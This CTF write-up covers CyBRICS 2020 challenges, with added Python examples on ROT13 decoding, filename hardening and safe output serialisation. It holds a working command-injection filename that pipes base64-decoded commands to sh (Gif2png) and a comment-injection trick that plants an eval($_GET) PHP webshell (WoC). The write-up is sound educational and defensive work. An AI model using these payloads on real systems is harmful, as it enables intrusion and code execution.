CyBRICS CTF 2020

2020/07/26

Mic Check (Cyber, Baby, 50 pts)

Have you read the game rules? There’s a flag there. But this year it’s ENCRYPTED, the same way as UserAssist values in Windows.

Also be sure to join @cybrics Telegram chat for challenge-related announcements and contacting orgs in case all goes wrong

https://www.jisuan.mobi/puzzm6z1B1HH6yXW.html

image-20200725195421089
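Added example, not part of the write-up: Windows stores UserAssist value names as ROT13 of the program path, so decoding the flag is the same operation the online tool above performs. The registry-style sample name is constructed for illustration.

```python
import codecs
import string

# Translation table for ROT13: A-Z and a-z shift by 13, everything else
# (digits, braces, hyphens, backslashes) passes through untouched.
_UP, _LO = string.ascii_uppercase, string.ascii_lowercase
_ROT13 = str.maketrans(_UP + _LO, _UP[13:] + _UP[:13] + _LO[13:] + _LO[:13])


def rot13(text: str) -> str:
    """Apply ROT13. It is its own inverse, so the same call encodes and decodes."""
    return text.translate(_ROT13)


# Constructed sample in the style of a UserAssist Count-key value name: the
# whole name, known-folder GUID included, is rotated on disk.
SAMPLE_USERASSIST_NAME = "{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\pzq.rkr"


def decode_userassist_name(name: str) -> str:
    """Decode a UserAssist value name; cross-checked against the stdlib codec."""
    decoded = rot13(name)
    assert decoded == codecs.decode(name, "rot_13")
    return decoded


if __name__ == "__main__":
    print(decode_userassist_name(SAMPLE_USERASSIST_NAME))
```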

Hunt (Web, Baby, 50 pts)

Zoom the page out and click them one by one.

Alternatively, change the front end with JS.
For example: https://github.com/csivitu/CTF-Write-ups/tree/master/CyBRICS%20CTF/Web/Hunt

http://109.233.57.94:54040/getprize.php?g-recaptcha-response=%7C03AGdBq26SQq8ph8H-H24ftIFbrFci2iZMdZPK_zkqgWre5J8iAuv1UiZ0dUMSNdRnQK44Q0_Mn0urWFmz0uVRemFeP_kJgXJpqQFXMXKoJtHrVmdRwp40FSPlyssyxsHBV0EZyX85zoqan2TKklJf_s0iBhOG83tk4lWR4M3AX23epULb3of9Q7-SnutUB2o6tZ2VzQqW9wt7zD8ZGu0NXnxWON4uYPEHe6D4lv_n1-bc0a8Pi93leLHHv6ysgAP98mphZ0Jqo_eHYmj7ltzz0fseu0-CvGOA3vNMlkAgdWN_Dj7qVvOCP6bMfwa3tpfiXyUxFPdQ_imxT6wEHLuYHIgKJD9Vjl7yTV8ESYO2neN_Xui6AEbmq2sIgrv7SSBw6E39FQSMh9Kf%7C03AGdBq27w5EkgjgaOTg8DQSCaw9sMdXKJDuE9QelMS7gkkBj2ezZWMZZHZ-8q4zEDzSSlAT8Hf6mU97lfs5ctlJeoppbXDfBc61P9R4qZupZioBpBLhtvvjXoiC5bkNlD5J9FpTqdURS195dpKiEVU-mRQNpv9iTncFCOmmvTo26xMzyAWyykRA50p1Q9hBEO2Lyg6kPIEU3TT3pKzSexHMabLheQkIWDJFsvNx6eXnvi37oWPm6yApKLLgVfHqPXsxgMeVlzjbpPQYg7HzlS0NOadrgs_qK0WdmicU76z_N6saIfCfdwqNrMT-TD3BusCE3wJe1b76lB8NYkdKrI-tBCAwyysoiXJaQhihvOcx9fAjPeQjYmd-w2C0vmnv0xeILoxL_WHE69%7C03AGdBq26J_TQoV_tFZWsbFO2kMy0a0g3PF-DZVY-Knmu4w9EWpSBOkbFYXhD7QQ6IsngoDSNQHZAj45b-MxYiyMAhrRsQdy0LYNoX_dXDBDTXFgbMXF3PNyazGELkUGH8lxJxhjqbbdnYQWIci0zWHV0HopnnTtev0a4RUyKRQUmAzzY6cLoM_XmHswXZmQrFDP62ycQ2HYkqrMD5SAb4huqh3ewMFd7dplR4VTawccs4C-RaUanjVMNqYZsOB90_Kr1OkmNtgd0FW7PT8qDRSep75eiMK8xFS2v4T_pm9J2aOOXYRmKQ_FcgDre0dIpuUBPwaPR9ZpTd-tYJpNlUmHXvLl0_ZjArG8_Bm4oV3fjaJgv8nmnjP7FpPzMwHhBt_Gkd37d41-g7%7C03AGdBq25pj2WAiwIRMcb5JCDmScURew5wmp6CdSpY8RAf_vJMqFIczdakr-vCoafpOBZ0S27tJ4Qip0fRxjIdIXFKarpZwvl2J4ovb56X-6VfqBcwpdIlakMGpOWatY51wkshIHRs9pAK6p22qH-3gPL-kf1YucGQkr9IQskZ3fofmXldbwerM1Nr1k1eT9naFcqVjZzd7FON3agWX94zQsJmhvt4KS_zsI_Tk7IwnuHHEoWIcI7HPQKH8Hz7vUwB8bZz_gyyNgof_35vovvoli6TJ5op9hl0Oe-EQen0n7ZHwlTsD5a7V6gY_TYL8bTdK46VVo_VtuUsoreVTlBDYj3Sx2ktGJu0SiRcN2CQSwyR4gERXe4JTfMPBbk4W6FjLCdNv1WxeogF%7C03AGdBq24TQIR1os8HBsDvg2wl8sDzzkuupVbTX-Kmz8DyuVmf06k_AlIQtxfUWJip_RjLhrkb35K20iWVr0UI6aE75OVEp0irlaW4p9jyhQS5lpxl9EmH83oQ-9D7-PB-VjdCsQduHDHJDlcbJNofvObPsq6nci2X7YAiFCC9-7osL3i0hZIEeLtriILLPzWL4MHJM52kqTqVHD4KAthspGNuPiFpdruX3fvDJLELLUVEQfmHc7xT8wG74ksiK8VUbqFFGits6tFXbn4xTzXisHgEufsyO9QU3T49hjSn16zKU5E9nFGxzlq4jW2tGiVk16iZQhovmHWInLk5m0p6DS2-PQ2QTVAi1x9InTTeSMRygI9XzPhppy0ntrKkFY4AlRoIgL8kyZtU

Gif2png (Web, Easy, 238 pts)

From the source code, the rough idea of this challenge is to read ffLaG from main.py.

image-20200726015043132

My first idea was to construct a symlink, but although the challenge has upload and download functions, there is unfortunately no place where a symlink could be used.

After re-auditing the code I noticed a command-execution point whose controllable parameter is file.filename.

image-20200726121147841

  • Constructing the payload

Note that the filename regex is ^[a-zA-Z0-9_-. '"=$()|]*$, the name has to end in .xxx.gif, and the type has to be image/gif.

# Create a tar of main.py and put it in the UUID directory (or any directory) that already exists under uploads
tar -cvf uploads/8f41d93e-5b12-4fcf-98a7-7294588a570e/1.tar main.py
# base64 : dGFyIC1jdmYgdXBsb2Fkcy84ZjQxZDkzZS01YjEyLTRmY2YtOThhNy03Mjk0NTg4YTU3MGUvMS50YXIgbWFpbi5weQ==


' fe1w0 || echo ' echo 'dGFyIC1jdmYgdXBsb2Fkcy84ZjQxZDkzZS01YjEyLTRmY2YtOThhNy03Mjk0NTg4YTU3MGUvMS50YXIgbWFpbi5weQ=='|base64 -d|sh||'1.gif
# fe1w0 is there to force the preceding part to fail
# Then just download the tar file

image-20200726121750684
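Added example (my code, not the challenge's main.py): the filename allow-list quoted above, reproduced next to a hardened upload handler. The `convert ...` command string is an assumption, since the page shows the vulnerable line only as a screenshot, and the hyphen in the regex is escaped on the assumption that a literal '-' was meant. It shows that the allow-list admits every character the payload needs, and that the fix is a strict name pattern, a server-generated name on disk, and an argv list so no shell ever parses the name.

```python
import re
import uuid
from pathlib import Path

# The character class as the write-up quotes it. Quotes, spaces, '|', '$', '='
# and parentheses are all allowed, so it blocks nothing a shell cares about.
CHALLENGE_NAME_RE = re.compile(r"^[a-zA-Z0-9_\-. '\"=$()|]*$")

# Shape of the write-up's filename, with the base64 body replaced by a placeholder.
PAYLOAD_SHAPE = "' fe1w0 || echo ' echo 'BASE64PLACEHOLDER'|base64 -d|sh||'1.gif"


def challenge_accepts(filename: str) -> bool:
    """The weak check as described above: regex allow-list plus a .gif suffix."""
    return bool(CHALLENGE_NAME_RE.match(filename)) and filename.endswith(".gif")


def build_vulnerable_command(upload_dir: str, filename: str) -> str:
    """Assumed shape of the vulnerable call: the user's name is pasted into one
    shell string, so a quote inside it ends the argument and the remainder is
    parsed as shell syntax. Returned, never executed."""
    return f"convert '{upload_dir}/{filename}' '{upload_dir}/out.png'"


# Hardened side.
STRICT_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.gif")
SHELL_META = set("'\"`$|;&<>()\\ \n")


def has_shell_metachars(filename: str) -> bool:
    """Detection helper for upload logs: a name carrying shell metacharacters
    has no legitimate filesystem reason to exist."""
    return any(c in SHELL_META for c in filename)


def accepted_by_strict_filter(filename: str) -> bool:
    """Full-match against a pattern with no metacharacters at all."""
    return STRICT_NAME_RE.fullmatch(filename) is not None


def build_safe_argv(upload_dir: str, original_name: str) -> list[str]:
    """Validate strictly, then never reuse the user's name: the stored file is
    '<uuid>.gif' and the converter receives argv entries (subprocess.run with a
    list and no shell=True), so nothing re-parses the name."""
    if not accepted_by_strict_filter(original_name):
        raise ValueError(f"rejected filename: {original_name!r}")
    src = Path(upload_dir) / f"{uuid.uuid4()}.gif"
    dst = src.with_suffix(".png")
    return ["convert", str(src), str(dst)]


if __name__ == "__main__":
    print("challenge filter accepts payload:", challenge_accepts(PAYLOAD_SHAPE))
    print(build_vulnerable_command("uploads/x", PAYLOAD_SHAPE))
    print("strict filter accepts payload:", accepted_by_strict_filter(PAYLOAD_SHAPE))
    print(build_safe_argv("uploads/x", "cat.gif"))
```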

XCorp (Network, Baby, 50 pts)

Author: Artur Khanov (@awengar)

We got into the XCorp network and captured some traffic from an employee’s machine. Looks like they were using some in-house software that keeps their secrets.

xcorp.tar.gz

A teammate solved this one. The rough idea: extract net10.exe from the pcap, log in with the user information found in the pcap, and when the encrypted username equals xcorporation the flag is printed.

WoC (Web, Medium, 237 pts)

Author: Vlad Roskov (@mrvos)

http://109.233.57.94:40389/calcs/85d45135a1c6f4c3/cc4b5923-6498-44ff-391a-03a16f35d485.php

Heheh heh hehh… 🤓

Source code: woc.tar.gz

I like the challenge name 🐕.jpg

The final step should be reading the flag file; unfortunately I didn't solve it.

  • The wrong approach:

Construct a webshell that satisfies the regex

#(?=^([ %()*+\-./]+|\d+|M_PI|M_E|log|rand|sqrt|a?(sin|cos|tan)h?)+$)^([^()]*|([^()]*\((?>[^()]+|(?4))*\)[^()]*)*)$#s

Then execute it here

image-20200726224022315

  • Constructing letters

Use arithmetic errors to obtain characters:

php > var_dump((0/0).(0));
PHP Warning: Division by zero in php shell code on line 1

Warning: Division by zero in php shell code on line 1
string(4) "NAN0"


php > var_dump((1/0).(0));
PHP Warning: Division by zero in php shell code on line 1

Warning: Division by zero in php shell code on line 1
string(4) "INF0"

I got stuck here: the regex filters {} and [], so individual characters cannot be extracted from a string, which had been the plan for building a webshell through $a++ and string concatenation.

  • The correct approach:

https://www.gem-love.com/ctf/2526.html

Use a crafted template HTML plus multi-line comment markers to splice into the original statement and thereby construct a webshell.

  • The main statements involved

file_put_contents("calcs/$userid/$calc.php", "<script>var preloadValue = <?=json_encode((string)($field))?>;</script>\n" . file_get_contents("inc/calclib.html") . file_get_contents("calcs/$userid/templates/$template.html"));
redir("?p=sharelink&calc=$calc"); // redirect to the share link; calc is passed to sharelink.php

Write the file with multi-line comment markers inside $field so that the webshell page calcs/$userid/$calc.php is spliced together.

  • The crafted template HTML
<html>
<head>
<meta charset="utf-8">
<title>iPhone X (test)</title>
<style>#field{top:37px;left:151px;width:565px;height:43px;background:black;border:0;color:#fff;font-family:Arial,sans-serif;font-size:40px;text-align:right;}#digit0{top:307px;left:468px;width:124px;height:47px;}#digit1{top:252px;left:465px;width:59px;height:47px;}#digit2{top:252px;left:531px;width:61px;height:48px;}#digit3{top:252px;left:598px;width:58px;height:48px;}#digit4{top:196px;left:465px;width:61px;height:48px;}#digit5{top:199px;left:534px;width:54px;height:44px;}#digit6{top:198px;left:597px;width:59px;height:47px;}#digit7{top:142px;left:466px;width:60px;height:46px;}#digit8{top:143px;left:534px;width:57px;height:46px;}#digit9{top:141px;left:599px;width:57px;height:49px;}#plus{top:252px;left:664px;width:58px;height:47px;}#minus{top:200px;left:665px;width:57px;height:42px;}#times{top:144px;left:664px;width:58px;height:45px;}#div{top:84px;left:665px;width:56px;height:48px;}#point{top:308px;left:600px;width:54px;height:48px;}#percent{top:88px;left:599px;width:56px;height:44px;}#sinh{top:309px;left:136px;width:59px;height:44px;}#cosh{top:309px;left:201px;width:60px;height:46px;}#tanh{top:309px;left:268px;width:61px;height:45px;}#pi{top:308px;left:334px;width:59px;height:46px;}#rand{top:309px;left:401px;width:57px;height:45px;}#e{top:252px;left:335px;width:58px;height:47px;}#sin{top:252px;left:136px;width:58px;height:48px;}#cos{top:252px;left:202px;width:58px;height:46px;}#tan{top:255px;left:268px;width:59px;height:43px;}#sqrt{top:198px;left:134px;width:59px;height:46px;}#log{top:197px;left:332px;width:60px;height:45px;}#obrace{top:89px;left:71px;width:56px;height:45px;}#cbrace{top:87px;left:136px;width:57px;height:46px;}#sq{top:142px;left:135px;width:59px;height:46px;}#cb{top:142px;left:202px;width:59px;height:46px;}#pow{top:143px;left:269px;width:58px;height:46px;}#epow{top:142px;left:335px;width:55px;height:47px;}#tenpow{top:140px;left:399px;width:59px;height:47px;}#clear{top:84px;left:465px;width:60px;height:49px;}#back{top:356px;left:295px;width:202px;height:15px;}#share{top:-29px;left:788px;width:93px;height:39px;opacity:1;font-size:22px;}#equals{top:307px;left:665px;width:57px;height:49px;}</style>
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width='100%' height='100%'><tr><td align='center' valign='middle'>
<form method="POST" style='display: inline-block; position: relative;'>
<img src="https://9to5mac.com/wp-content/uploads/sites/6/2018/05/iphone-calculator-tips-tricks-2.jpg?quality=82&strip=all" style="height: 400px" />
<input type="text" class="part" id="field" name="field" />
<input type="button" class="part" id="digit0" data-append="0" />
<input type="button" class="part" id="digit1" data-append="1" />
<input type="button" class="part" id="digit2" data-append="2" />
<input type="button" class="part" id="digit3" data-append="3" />
<input type="button" class="part" id="digit4" data-append="4" />
<input type="button" class="part" id="digit5" data-append="5" />
<input type="button" class="part" id="digit6" data-append="6" />
<input type="button" class="part" id="digit7" data-append="7" />
<input type="button" class="part" id="digit8" data-append="8" />
<input type="button" class="part" id="digit9" data-append="9" />
<input type="button" class="part" id="plus" data-append=" + " />
<input type="button" class="part" id="minus" data-append=" - " />
<input type="button" class="part" id="times" data-append=" * " />
<input type="button" class="part" id="div" data-append=" / " />
<input type="button" class="part" id="point" data-append="." />
<input type="button" class="part" id="percent" data-append="%" />
<input type="button" class="part" id="sinh" data-append=" sinh(" />
<input type="button" class="part" id="cosh" data-append=" cosh(" />
<input type="button" class="part" id="tanh" data-append=" tanh(" />
<input type="button" class="part" id="pi" data-append=" M_PI " />
<input type="button" class="part" id="rand" data-append=" rand() " />
<input type="button" class="part" id="e" data-append=" M_E " />
<input type="button" class="part" id="sin" data-append=" sin(" />
<input type="button" class="part" id="cos" data-append=" cos(" />
<input type="button" class="part" id="tan" data-append=" tan(" />
<input type="button" class="part" id="sqrt" data-append=" sqrt(" />
<input type="button" class="part" id="log" data-append=" log(" />
<input type="button" class="part" id="obrace" data-append="(" />
<input type="button" class="part" id="cbrace" data-append=")" />
<input type="button" class="part" id="sq" data-append="**2" />
<input type="button" class="part" id="cb" data-append="**3" />
<input type="button" class="part" id="pow" data-append=" ** " />
<input type="button" class="part" id="epow" data-append=" M_E ** " />
<input type="button" class="part" id="tenpow" data-append=" 10 ** " />
<input type="button" class="part" id="clear" />
<input type="button" class="part" id="back" value="← Back" />
<input type="submit" class="part" id="share" name="share" value="Share" />
<input type="submit" class="part" id="equals" />
</form>
</td></tr></table>
</body>
</html>*/;eval($_GET[xz]);?>

  • Multi-line comment markers
file_put_contents("calcs/$userid/$calc.php", "<script>var preloadValue = <?=json_encode((string)($field))?>;</script>\n" . file_get_contents("inc/calclib.html") . file_get_contents("calcs/$userid/templates/$template.html"));

/*((*/1))/* # to satisfy the regex

<?=json_encode((string)(/*((*/1))/*))*/;eval($_GET[xz]);?>

image-20200730003644954
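Added example in Python (my code, not the challenge's PHP): a model of the file_put_contents writer above beside a version that serialises the field at write time. The inputs are constructed from the write-up's values (the comment-injection field and the tail of the crafted template). The calculator regex itself is not reproduced, because its (?4) recursion needs PCRE; the point is that no expression regex helps once the value is pasted inside a PHP tag and evaluated when the generated page is loaded.

```python
import json
import re

# Constructed inputs: the field from the write-up, a template whose tail carries
# a PHP close tag and eval as in the crafted template, and a stand-in calclib.
FIELD = "/*((*/1))/*"
TEMPLATE = "<html><body>calc</body></html>*/;eval($_GET[xz]);?>"
CALCLIB = "<script>/* calclib */</script>\n"


def write_calc_vulnerable(field: str, template: str) -> str:
    """Shape of the challenge's writer: the regex-validated expression is pasted
    inside a <?= ?> tag, so it is PHP source that runs when calcs/$userid/$calc.php
    is requested. A /* in the field comments out everything up to the template's */.
    Returns the text the challenge would write to disk."""
    return (f"<script>var preloadValue = <?=json_encode((string)({field}))?>;</script>\n"
            + CALCLIB + template)


def php_spans(source: str) -> list[str]:
    """Every <? ... ?> span PHP would execute in the generated file."""
    return re.findall(r"<\?.*?\?>", source, re.S)


def has_php_open_tag(source: str) -> bool:
    return "<?" in source


def user_value_inside_php(source: str, value: str) -> bool:
    """Review/detection check: does the raw user value land inside PHP code?"""
    return any(value in span for span in php_spans(source))


def json_for_script(value: str) -> str:
    """json.dumps plus \\u-escapes for < > & so the literal can neither close the
    <script> element nor open a PHP tag (PHP equivalent: JSON_HEX_TAG|JSON_HEX_AMP)."""
    return (json.dumps(value).replace("<", "\\u003c")
            .replace(">", "\\u003e").replace("&", "\\u0026"))


def write_calc_safe(field: str, template: str) -> str:
    """Serialise now, evaluate nothing later: the stored page carries a finished
    JSON string literal and contains no PHP open tag, so it can be saved as .html
    under a path the server never hands to the PHP interpreter."""
    return (f"<script>var preloadValue = {json_for_script(field)};</script>\n"
            + CALCLIB + template)


if __name__ == "__main__":
    vuln = write_calc_vulnerable(FIELD, TEMPLATE)
    print("PHP spans in vulnerable output:", php_spans(vuln))
    print("user value inside PHP:", user_value_inside_php(vuln, FIELD))
    safe = write_calc_safe(FIELD, TEMPLATE)
    print("PHP open tag in safe output:", has_php_open_tag(safe))
```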
